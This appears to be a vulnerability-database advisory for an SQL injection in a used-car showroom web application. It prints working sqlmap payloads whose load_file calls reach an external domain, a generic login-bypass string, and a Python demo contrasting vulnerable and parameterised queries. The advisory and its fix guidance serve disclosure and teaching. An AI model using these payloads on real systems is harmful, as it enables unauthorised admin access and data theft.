Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown

CVE-2021-44655

Last updated January 10, 2022
Execution
Validation
Validated

Description

Online Pre-owned/Used Car Showroom Management System 1.0 contains a SQL injection vulnerability in the admin panel login form. Because the login form's input is placed unsafely into a SQL query, admin panel authentication can be bypassed, allowing an attacker to obtain admin access to the application.

Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Description:

The bid, c & id parameters of the /used_car_showroom/ node app on Online Pre-owned/Used Car Showroom Management System 1.0 appear to be vulnerable to multiple time-based blind SQL injection attacks. The payload '+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+' was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take control of the administrator account on this system. Status: CRITICAL

[+] Payloads:

  • Multiple: bid, c & id
---
Parameter: bid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---
Parameter: c (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---

Reproduce:


Proof and Exploit:

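Added example, not code from this page or from the Online Pre-owned/Used Car Showroom Management System project: a self-contained Python script with an in-memory SQLite database that shows the query-construction mistake behind both findings above, the login-form authentication bypass in the description and the quoted bid parameter that the sqlmap payloads in the analysis depend on. The table and column names, the seeded rows and the generic `' OR 1=1 -- ` login string are assumptions for illustration only; the page does not publish the actual login payload. The page's own bid payload is MySQL-specific (SLEEP, load_file), so it is only rendered into query text here, never executed.

```python
import sqlite3

# Constructed, hypothetical schema for the demo. The real application's table
# and column names are not published on this page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")  # plaintext only for the demo
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, brand_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, 7, "Civic"), (2, 7, "Accord"), (3, 2, "Golf")])
    return conn

# --- Login form: the authentication-bypass class described on the page ---

def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so the caller's input becomes SQL text."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()

def login_fixed(conn, username, password):
    """Same lookup with bound parameters: the input can never change the query's structure."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()

# --- page=product_per_brand: the bid parameter from the analysis ---

# The exact bid payload from the sqlmap output above. It is MySQL-specific and
# is only rendered into query text here (SQLite has neither SLEEP nor load_file).
PAGE_BID_PAYLOAD = r"7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl"

def brand_query(bid):
    """Vulnerable query shape the payload relies on: bid lands inside a quoted literal,
    and the payload's trailing 'ovPl'='ovPl re-balances the closing quote."""
    return "SELECT name FROM products WHERE brand_id = '" + bid + "'"

def products_by_brand_vulnerable(conn, bid):
    return [row[0] for row in conn.execute(brand_query(bid))]

def products_by_brand_fixed(conn, bid):
    """Validate the type first, then bind the value; either measure alone stops the injection."""
    if not bid.isdigit():
        raise ValueError("bid must be a non-negative integer")
    return [row[0] for row in
            conn.execute("SELECT name FROM products WHERE brand_id = ?", (int(bid),))]

if __name__ == "__main__":
    conn = make_db()
    # Generic login-bypass string (assumption; the page does not publish the real one):
    print(login_vulnerable(conn, "' OR 1=1 -- ", "anything"))   # (1,): admin row returned
    print(login_fixed(conn, "' OR 1=1 -- ", "anything"))        # None
    print(brand_query(PAGE_BID_PAYLOAD))                         # SLEEP/load_file now inside the SQL text
    print(products_by_brand_vulnerable(conn, "7' OR '1'='1"))   # every product, not only brand 7
```

The fix in both paths is the bound parameter; the integer check on bid is defence in depth and also gives a clean 400 instead of a database error. One caveat on the analysis above: the out-of-band load_file trick works only where the database account holds the FILE privilege and secure_file_priv does not forbid the read, whereas the SLEEP-based timing check has no such dependency, which is why sqlmap reports the time-based vector as the confirmed one.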
